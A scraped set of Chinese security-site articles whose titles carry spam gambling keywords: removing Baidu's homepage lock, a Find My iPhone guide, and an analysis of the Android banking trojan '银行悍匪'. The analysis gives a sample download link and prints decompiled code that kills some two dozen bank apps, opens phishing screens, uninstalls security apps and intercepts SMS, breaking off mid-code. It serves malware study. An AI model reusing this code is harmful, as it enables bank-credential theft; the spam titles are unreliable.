[系统安全]BaiduProtect.exe进程无法删除-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/48684_1.html 西西 系统安全 2014/12/24 22:41:24 <p>最近这几天不知是安装了一个什么程序,打开任何浏览器无论如何设置打开的第一个页面总是 <a href="http://www.baidu.com/" _src="http://www.baidu.com/">http://www.baidu.com/</a>&nbsp;就算把ie的主页改成任何网址都无效,用万能的360任何修复首页或锁定首页都无效,马上把所有不知名的软件全部给删了,包括百度卫士、百度杀毒等全删了也是无效。</p><p>没办法只好到注册表中搜 <a href="http://www.baidu.com" _src="http://www.baidu.com">www.baidu.com</a>&nbsp;然后再一个一个改来确定看值是不是存在注册表中。</p><p><br/></p><p>结果查到</p><p>HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Baidu\BaiduProtect\LockIEStartPage 下面的&nbsp;Start Page 的值改一下后就可以修改过来</p><p><img src="https://pic.cr173.com/up/2014-12/14194317429326506.jpg" title="abc.jpg"/></p><p><br/></p><p>推荐大家用RegWorkshop来查注册表非常方便,比系统自带的regedit 要方便多了,支持64、32位系统,下载地址:<a href="http://www.pjyuanjian.com/soft/3321.html" _src="https://pic.cr173.com/soft/3321.html">http://www.pjyuanjian.com/soft/3321.html</a> </p><p><br/></p><p>通过这个注册表项基本上就猜测出来了<span style="line-height: 12px;">BaiduProtect的一个安全产品,然后在任务管理器就找到了进程 &nbsp;<span style="line-height: 12px;">BaiduProtect.exe 然后定位到程序目录下</span></span></p><p><span style="line-height: 12px;"><span style="line-height: 12px;">C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.323</span></span></p><p><span style="line-height: 12px;"><span style="line-height: 12px;">目录下有&nbsp;uninst.exe 双击就可以把这个服务给删掉了</span></span></p><p><span style="line-height: 12px;"><span style="line-height: 12px;"><br/></span></span></p><p><span style="line-height: 12px;"><span style="line-height: 12px;"><br/></span></span></p> [安全产品]苹果手机丢了怎么定位?使用”查找我的iphone“帮您找回手机-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/34024_1.html 西西 安全产品 2014/6/23 11:07:38 <p>今天教大家一个特别简单的找丢失了的iphone的办法,只需要一部手机或者是一台电脑就可以。可以利用网页登录iCloud来使用“查找我的iphone”,通过控制iphone使用来达到保护资料、隐私、甚至找回iphone!</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2014-6/201406231053013264524.png"/></p><p><strong>利用iphone来操作查找iphone</strong></p><p>1.利用iphone手机来操作查找iphone在iphone上打开App Store先下载软件“查找我的iphone”并安装。下载完成后在iphone的桌面上打开“查找iphone”的图标;&nbsp;</p><p>2.打开后会显示登录界面,在登录界面输入你的Apple ID、密码后进行登录“查找我的iphone”软件(注意:如果iCloud帐户尚未关联Apple ID将无法进行登录,所以要先到设置选项中的“iCloud”激活iCloud帐户再进行操作);</p><p><strong>利用网页登录iCloud来操作查找iphone</strong></p><p>以上的“查找我的iphone”软件登录后就可以了,现在我来说一下如何使用iCloud来操作查找我的iphone的方法。</p><p>1.首先用电脑打开iCloud官网并用Apple ID登录iCloud帐户;</p><p>2.登录成功后可以看到iCloud界面中左下角有个“查找我的iphone”的图标,点击打开该图标并再次输入Apple ID密码以使用“查找我的iphone”功能</p><p>3.然后在登录成功后在界面顶部选择好你的iphone设备,如果你iphone的定位没有打开的则看不到iphone在哪里,只有在定位打开了就能看到你的iphone在哪里。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2014-6/201406231053208524641.png"/></p><p><span style="color: rgb(255, 0, 0);"><strong>iphone未打开定位服务的操作方法</strong></span></p><p>1.iphone不可能无时无该都保证打开定位服务,我的也是一样为了省电、保护隐私等等经常性关闭GPS定位。现在说说iphone未打开定位服务操作“查找我的iphone”的方法,其实打开了定位服务操作也是一样,只不过是多了地图显示位置的区别的而已 如未打开定位服务则使用“查找我的iphone”中的功能来找回或保护隐私、资料等。</p><p>2.“播放铃声”功能:通过播放铃声来提醒该iphone属于失物,使用该功能后会在丢失的iphone中显示提醒;点击“播放铃声或者发送信息”,就可以给设备发送消息,可告知别人你的联系方式,遇到好心人也许就能寻回iPhone。这个方法也试用于知道iPhone的位置但却找不到,或许听到铃声就找到啦。</p><p>3. “丢失模式”功能:通过设置丢失模式可以在丢失的iphone上显示你所想对拾获者说的话。 第一步:先设置你现在的手机号码(非已丢失iphone中的手机号码),这个手机号码的用处主要是用来显示在丢失的iphone上的,让拾获者看到后可以主动联系你归还。当然啦,这个得拾获者良心发现! 第二步:输入你所说的话,可以是一些警告性话语等等。设置完成这一步骤后点击右上角的完成即可,iphone会进入丢失模式并使用现有密码进行锁定你的iphone;</p><p>4.抹掉iphone”功能:就算前面两招都没有用的话,那么最后一招则可以防止你的隐私被涉漏。选择抹掉iphone功能后,你iphone上的所有东西都会被删除,这样就不用担心隐私涉漏了。适用于找不回iphone的情况下,可以将隐私性质的信息销毁,将损失降到最低。</p> [病毒漏洞]android病毒“银行悍匪”独家分析-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/28594_1.html 西西小熊 病毒漏洞 2014/3/24 9:14:21 <p><strong>一、&nbsp;&nbsp;</strong><strong>病毒样本基本信息</strong></p><p>FileName: b5910a432d2b866e1028f31874edb32f .apk<br/>File MD5: b5910a432d2b866e1028f31874edb32f</p><p>SHA1:0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1</p><p>File Size: 829006 Byte</p><p>Package:langthing.nend &nbsp;&nbsp;</p><p><strong>Download:http://yunpan.cn/Q4qHuRLaNivtd&nbsp; &nbsp; 访问密码 3a90&nbsp; &nbsp;&nbsp;&nbsp;解压密码:52pojie</strong><br/><br/>// 该病毒首先伪装成系统程序防止卸载;然后试着去卸载安全软件;监测各种银行应用;对需要拦截短信的关键字进行了加密,增加了分析的难度;没有MAIN和LAUNCHER组件,安装后没有图标,防止用户察觉到安装了应用</p><p><strong>二、&nbsp;&nbsp;</strong><strong>病毒代码分析</strong></p><p>查看AndroidManifest.xml配置文件,可以发现赋予了病毒非常多的权限,且是高危的权限,例如发送短信、拨打电话、读取日志文件、重启应用程序等等,且没有MAIN和LAUNCHER组件</p><p>&lt;manifest android:versionCode=&quot;1&quot; android:versionName=&quot;1.1&quot; package=&quot;langthing.nend&quot;</p><p>&nbsp; xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;&gt;</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.RECEIVE_SMS&quot; /&gt; &nbsp;//接收短信</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.SEND_SMS&quot; /&gt; &nbsp; &nbsp; &nbsp;//发送短信</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.READ_SMS&quot; /&gt; &nbsp; &nbsp; //读取短息</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.WRITE_SMS&quot; /&gt; &nbsp;//编辑短信</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.SEND_SMS&quot; /&gt;</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.READ_CONTACTS&quot; /&gt; &nbsp; &nbsp;//读取通讯录</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.WRITE_SETTINGS&quot; /&gt; &nbsp; //读取系统设置的数据库权限</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.READ_LOGS&quot; /&gt; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //读取日志文件</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.WRITE_CONTACTS&quot; /&gt;//编辑通讯录联系人</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.READ_PHONE_STATE&quot; /&gt;//读取电话状态</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.CALL_PHONE&quot; /&gt; &nbsp; &nbsp; &nbsp; &nbsp; //拨打电话</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.RECEIVE_BOOT_COMPLETED&quot; /&gt;//接收开机信息</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.GET_TASKS&quot; /&gt; &nbsp;//获取运行程序信息</p><p>&lt;uses-permission android:name=&quot;android.permission.RESTART_PACKAGES&quot; /&gt;//重启应用程序</p><p>查看AndroidManifest.xml配置文件,可以发现当手机接收到TReceiver、eviceAdminReceiver、Alarmreceiver等组件时就会启动程序</p><p>receiver android:name=&quot;.TReceiver&quot;&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;intent-filter android:priority=&quot;2147483647&quot;&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;action android:name=&quot;android.intent.action.BOOT_COMPLETED&quot; /&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/intent-filter&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &lt;/receiver&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &lt;receiver android:label=&quot;@string/app_name&quot; android:name=&quot;.deviceAdminReceiver&quot; android:permission=&quot;android.permission.BIND_DEVICE_ADMIN&quot;&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;meta-data android:name=&quot;android.app.device_admin&quot; android:resource=&quot;@xml/device_admin&quot; /&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;intent-filter&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;action android:name=&quot;android.app.action.DEVICE_ADMIN_ENABLED&quot; /&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/intent-filter&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &lt;/receiver&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &lt;receiver android:name=&quot;.Alarmreceiver&quot;&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;intent-filter&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;action android:name=&quot;arui.alarm.action&quot; /&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/intent-filter&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &lt;/receiver&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &lt;receiver android:name=&quot;.ShutdownReceiver&quot;&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;intent-filter&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;action android:name=&quot;android.intent.action.ACTION_SHUTDOWN&quot; /&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/intent-filter&gt;</p><p><span style="color: rgb(255, 0, 0); ">恶意注入代码的代码树如下:</span></p><p><img src="https://pic.cr173.com/up/201403/091544_2840314567089.png"/>&nbsp;<br/><br/>当程序安装后,会伪装成系统程序,防止卸载。如图:<br/><br/><img src="https://pic.cr173.com/up/201403/091544_3336720108985.png"/>&nbsp;<br/></p><p><span style="color: rgb(255, 0, 0); ">查看langthing.nend.main伪装成系统代码如下:</span></p><p>private void b()</p><p>&nbsp; {</p><p>&nbsp; &nbsp; Intent localIntent = new Intent(&quot;android.app.action.ADD_DEVICE_ADMIN&quot;);</p><p>&nbsp; &nbsp; localIntent.putExtra(&quot;android.app.extra.DEVICE_ADMIN&quot;, this.c);</p><p>&nbsp; &nbsp; localIntent.putExtra(&quot;android.app.extra.ADD_EXPLANATION&quot;, &quot;------ android ------&quot;); &nbsp;// &nbsp;伪装成系统应用</p><p>&nbsp; &nbsp; startActivityForResult(localIntent, 1);</p><p>&nbsp; }</p><p>当应用监测到银行客户端启动时,就会终止个银行进程,并为工商银行、淘宝等定制了高仿真“钓鱼界面”<br/></p><p>private void e()</p><p>&nbsp; {</p><p>&nbsp; &nbsp; ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;</p><p>&nbsp; &nbsp; ActivityManager localActivityManager = (ActivityManager)getSystemService(&quot;activity&quot;);</p><p>&nbsp; &nbsp; String str = localComponentName.getClassName();</p><p>&nbsp; &nbsp; if ((str.contains(&quot;gs.gs&quot;)) || (str.contains(&quot;js.js&quot;)) || (str.contains(&quot;jt.jt&quot;)) || (str.contains(&quot;tb.tb&quot;)) || (str.contains(&quot;dz.dz&quot;)))</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.icbc&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.icbc&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.chinamworld.main&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.chinamworld.main&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.bankcomm&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.bankcomm&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.taobao.taobao&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.taobao.taobao&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.android.bankabc&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.android.bankabc&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cmb.pb&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cmb.pb&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.rytong.bankgdb&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.rytong.bankgdb&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.cib.bankcib&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.cib.bankcib&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.rytong.bankps&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.rytong.bankps&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cn.com.njcb.android.mobilebank&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cn.com.njcb.android.mobilebank&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.ecitic.bank.mobile&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.ecitic.bank.mobile&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.cebbank.bankebb&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.cebbank.bankebb&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cn.com.cmbc.mbank&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cn.com.cmbc.mbank&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cn.com.spdb.mobilebank.per&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cn.com.spdb.mobilebank.per&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.pingan.pabank.activity&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.pingan.pabank.activity&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.gzrcb.mobilebank&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.gzrcb.mobilebank&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cn.com.cqb.mobilebank.per&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cn.com.cqb.mobilebank.per&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.chinamworld.bocmbci&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.chinamworld.bocmbci&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.rytong.app.bankhx&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.rytong.app.bankhx&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.csii.huzhou.mobilebank&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.csii.huzhou.mobilebank&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cn.com.shbank.mper&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cn.com.shbank.mper&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.rytong.bankqd&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.rytong.bankqd&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.tlbank&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.tlbank&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.sookin.scyh&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.sookin.scyh&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cn.com.hzb.mobilebank.per&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cn.com.hzb.mobilebank.per&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.chinamworld.klb&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.chinamworld.klb&quot;);</p><p>}</p><p>if (str.contains(&quot;icbc&quot;))</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; Cursor localCursor27 = c.a(&quot;yh&quot;, new String[] { &quot;_id&quot;, &quot;mc&quot;, &quot;jilu&quot; }, &quot;mc=?&quot;, new String[] { &quot;gs&quot; }, null, null, null);</p><p>&nbsp; &nbsp; &nbsp; if ((localCursor27.moveToFirst()) &amp;&amp; (localCursor27.getInt(localCursor27.getColumnIndex(&quot;jilu&quot;)) == 0))</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.icbc&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent53 = new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent53.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent53.addCategory(&quot;android.intent.category.HOME&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent53);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent54 = new Intent(getApplicationContext(), gs.class);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent54.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent54);</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; }</p><p>&nbsp; &nbsp; if (str.contains(&quot;com.chinamworld.main&quot;))</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; Cursor localCursor26 = c.a(&quot;yh&quot;, new String[] { &quot;_id&quot;, &quot;mc&quot;, &quot;jilu&quot; }, &quot;mc=?&quot;, new String[] { &quot;js&quot; }, null, null, null);</p><p>&nbsp; &nbsp; &nbsp; if ((localCursor26.moveToFirst()) &amp;&amp; (localCursor26.getInt(localCursor26.getColumnIndex(&quot;jilu&quot;)) == 0))</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.chinamworld.main&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent51 = new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent51.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent51.addCategory(&quot;android.intent.category.HOME&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent51);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent52 = new Intent(getApplicationContext(), js.class);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent52.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent52);</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; }</p><p>&nbsp; &nbsp; if (str.contains(&quot;bankcomm&quot;))</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; Cursor localCursor25 = c.a(&quot;yh&quot;, new String[] { &quot;_id&quot;, &quot;mc&quot;, &quot;jilu&quot; }, &quot;mc=?&quot;, new String[] { &quot;jt&quot; }, null, null, null);</p><p>&nbsp; &nbsp; &nbsp; if ((localCursor25.moveToFirst()) &amp;&amp; (localCursor25.getInt(localCursor25.getColumnIndex(&quot;jilu&quot;)) == 0))</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.bankcomm&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent49 = new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent49.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent49.addCategory(&quot;android.intent.category.HOME&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent49);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent50 = new Intent(getApplicationContext(), jt.class);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent50.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent50);</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; }</p><p>&nbsp; &nbsp; if (str.contains(&quot;taobao&quot;))</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; Cursor localCursor24 = c.a(&quot;yh&quot;, new String[] { &quot;_id&quot;, &quot;mc&quot;, &quot;jilu&quot; }, &quot;mc=?&quot;, new String[] { &quot;tb&quot; }, null, null, null);</p><p>&nbsp; &nbsp; &nbsp; if ((localCursor24.moveToFirst()) &amp;&amp; (localCursor24.getInt(localCursor24.getColumnIndex(&quot;jilu&quot;)) == 0))</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.taobao.taobao&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent47 = new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent47.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent47.addCategory(&quot;android.intent.category.HOME&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent47);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent48 = new Intent(getApplicationContext(), tb.class);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent48.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent48);</p><p>&nbsp; &nbsp; &nbsp; }</p><p>// &nbsp;终止各银行进程</p><p>查找安全软件并卸载安全软件<br/></p><p>for (g = &quot;Already root&quot;; ; g = &quot;NOroot&quot;)</p><p>&nbsp; &nbsp;{</p><p>&nbsp; &nbsp; &nbsp;this.C = 5;</p><p>&nbsp; &nbsp; &nbsp;this.E = 5;</p><p>&nbsp; &nbsp; &nbsp;this.B = new String[this.C];</p><p>&nbsp; &nbsp; &nbsp;this.D = new String[this.E];</p><p>&nbsp; &nbsp; &nbsp;this.B[0] = &quot;pm uninstall com.qihoo360.mobilesafe&quot;; &nbsp; &nbsp; //卸载360、腾讯、金山等相关的安全软件</p><p>&nbsp; &nbsp; &nbsp;this.B[1] = &quot;pm uninstall com.tencent.qqpimsecure&quot;;&nbsp;</p><p>&nbsp; &nbsp; &nbsp;this.B[2] = &quot;pm uninstall com.ijinshan.mguard&quot;; &nbsp; &nbsp; &nbsp;&nbsp;</p><p>&nbsp; &nbsp; &nbsp;this.B[3] = &quot;pm uninstall com.ijinshan.duba&quot;; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</p><p>&nbsp; &nbsp; &nbsp;this.B[4] = &quot;pm uninstall com.anguanjia.safe&quot;;</p><p>&nbsp; &nbsp; &nbsp;this.D[0] = &quot;com.qihoo360.mobilesafe&quot;;</p><p>&nbsp; &nbsp; &nbsp;this.D[1] = &quot;com.tencent.qqpimsecure&quot;;</p><p>&nbsp; &nbsp; &nbsp;this.D[2] = &quot;com.ijinshan.mguard&quot;;</p><p>&nbsp; &nbsp; &nbsp;this.D[3] = &quot;com.ijinshan.duba&quot;;</p><p>&nbsp; &nbsp; &nbsp;this.D[4] = &quot;com.anguanjia.safe&quot;;</p><p>&nbsp; &nbsp; &nbsp;this.s = new o();</p><p>拦截相关短信:<br/></p><p>f (i5 == 1)</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ((server.f == 0) &amp;&amp; (server.a != i3))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, 1);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.b(this.a, i3);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; str4 = &quot;接收&quot;;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, new o());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; String str5 = server.d(this.a).a(this.a.getApplicationContext());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, new n());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(&quot;[ &quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(str1 + &quot;, &quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(i4 + &quot;, &quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(str2 + &quot;, &quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(str3 + &quot;, &quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(str4);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(&quot; ]\n\n&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (!localCursor1.isClosed())</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localCursor1.close();</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; &nbsp; while (true)</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(&quot;getSmsInPhone has executed!&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; super.onChange(paramBoolean);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; return;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; server.f = 0;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; 